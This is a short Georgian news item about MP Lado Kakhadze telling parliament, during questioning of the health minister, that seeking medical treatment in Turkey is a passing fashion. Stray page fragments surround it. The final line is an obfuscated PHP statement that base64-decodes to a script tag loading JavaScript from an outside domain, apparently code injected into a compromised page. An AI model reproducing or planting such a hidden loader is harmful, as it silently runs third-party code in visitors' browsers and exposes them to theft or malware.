celsiusi
ავერსი შნაიდერი
"ქართული ოცნების" დეპუტატმა, ლადო კახაძემ პარლამენტში ჯანდაცვის პოლიტიკა შეაფასა. დეპუტატის თქმით, დღეს თურქეთში წასვლა და იქ მკურნალობა „მოდაშია“, ისევე როგორც ადრე მოსკოვში ან საფრანგეთში დადიოდნენ. 
 
„ქართველებო, მე იმ თაობის ვარ, მოსკოვი იყო მაშინ მოდაში და მოსკოვში ჩადიოდნენ და ოპერაციებს იქ იკეთებდნენ. ისინი ეუბნებოდნენ, ეგნატე ფიფია იქ არ გყავთ, თქვე დალოცვილის შვილებო, მიხეილ ჩაჩავა იქ არ გყავთ, აქ რატომ მორბიხართო, მაგრამ ეს ქართული ფენომენია. ახლა თურქეთია მოდაში. მანამდე ავსტრია იყო მოდაში და საფრანგეთი. იქ ექიმის შეცდომით თუ რამე მოუვა ვინმეს, არავინ არ ამჟღავნებს და იმდენი სიხარული მე, რამდენიც ვიცი იქ ნამკურნალები მერე ჩემთან მოსული“, - თქვა ლადო კახაძემ.
 
ცნობისთვის, დღეს საქართველოს პარლამენტში, ინტერპელაციის წესით, ჯანდაცვის მინისტრ ზურაბ აზარაშვილს უსმენდნენ.
413
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");